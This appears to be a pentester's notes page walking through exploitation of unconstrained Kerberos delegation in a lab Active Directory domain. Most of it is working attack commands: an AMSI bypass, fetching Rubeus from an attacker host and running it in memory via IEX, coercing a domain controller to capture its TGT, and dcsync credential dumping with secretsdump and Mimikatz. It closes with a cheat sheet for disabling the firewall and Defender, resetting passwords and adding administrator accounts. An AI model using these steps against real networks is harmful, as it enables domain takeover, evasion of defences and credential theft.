Unconstrain

To exploit an unconstrained delegation the simplest way is to do that from windows with Rubeus.
We launch an RDP connection on Bronx.
We got Fernando.Alonzo password's from the donPAPI dump
https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html#unconstrained-delegation

xfreerdp /d:north.newyork.local /u:fernando.alonzo /p:'IDr1R3allyF@sTF1!' /v:192.168.56.11 /size:80%  /cert-ignore

From there we will bypass AMSI and launch Rubeus in memory

Prepare our server containing Rubeus.exe and our AMSI bypass.

python3 -m http.server 8080

On the RDP session bypass AMSI :

amsi_rmouse.txt contains the below commands

# Patching amsi.dll AmsiScanBuffer by rasta-mouse
$Win32 = @"

using System;
using System.Runtime.InteropServices;

public class Win32 {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

}
"@

Add-Type $Win32

$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)

Download Rebeus.exe to Parrot OS

wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe

Download the and execute amsi_rmouse.txt to bypass AMSI

$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')|IEX

Now launch Rubeus in memory with execute assembly.
First we will list the available tickets :

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8000/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data);
[Rubeus.Program]::MainString("triage");

And now force a coerce of the DC NYC to the DC Bronx.

Coercer fuzz -u pablo.sandoval -d north.newyork.local -p baseballpanda -t nyc.newyork.local

We look on the triage again :

[Rubeus.Program]::MainString("triage")

And now the tgt of NYC is present

To extract it (relaunch coercer and 1 sec later launch the following dump command): (i don’t know why but the rubeus monitor mode doesn’t want to run in execute assembly)

[Rubeus.Program]::MainString("dump /user:nyc$ /service:krbtgt /nowrap");

We now have the TGT of the domain controller
Let’s continue on linux to pass the ticket and launch dcsync with secretdump :
- copy the ticket without space and return line (in vim i do : :%s/\s*\n\s*//g)
- convert the ticket to ccache
- use the kerberos ticket and launch secretdump

cat tgt.b64|base64 -d > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/workspace/unconstrained/ticket.ccache
secretsdump.py -k -no-pass NEWYORK.LOCAL/'NYC$'@NYC

Another way of exploitation, is to do a ptt with Rubeus and launch a dcsync with Mimikatz but this implies to run Mimikatz on bonx and bypass the defender AV

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')

https://github.com/SolomonSklash/RubeusToCcache

rubeus.exe monitor /targetuser:nyc$ /interval:10

https://github.com/jtmpu/PrecompiledBinaries/blob/master/SpoolSample.exe
SpoolSample.exe nyc bronx
kerberos::ptt C:\Users\fernando.Alonzo\Desktop\DC.kirbi

lsadump::dcsync /domain:newyork.local /user:nyc$
[IO.File]::WriteAllBytes("C:\Users\fernando.Alonzo\Desktop\DC.kirbi", [Convert]::FromBase64String("base64"))
https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20220919


kerberos::ptt C:\Users\fernando.Alonzo\Desktop\DC.kirbi

lsadump::dcsync /domain:newyork.local /user:nyc$
lsadump::lsa /domain:newyork.local /user:nyc$
lsadump::dcsync /user:krbtgt

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation


CMD
#Disable Firewall
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"

Set-MpPreference -DisableRealtimeMonitoring $true


#Change User Password via powershell administrator
Set-ADAccountPassword -Identity $user -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "$newPass" -Force)

#Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


#Create new user
net user username password /ADD


#To add a new user account to the domain:
net user username password /ADD /DOMAIN


#Add user to Admin Group
net localgroup Administrators Tom /add

PreviousDelegations NextConstrain Delegation

Last updated 2 years ago